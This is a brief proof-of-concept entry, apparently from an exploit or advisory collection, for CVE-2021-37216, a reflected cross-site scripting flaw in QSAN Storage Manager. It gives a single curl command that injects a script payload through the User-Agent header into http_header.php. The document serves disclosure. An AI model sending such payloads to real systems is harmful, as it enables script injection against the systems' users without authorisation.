CVE-2021-37216: Reflected XSS in QSAN Storage Manager
Proof of Concept
Inject one of the headers e.g. in User-Agent then send a request to
$ curl http://host/http_header.php -A "<script>alert(1)</script>"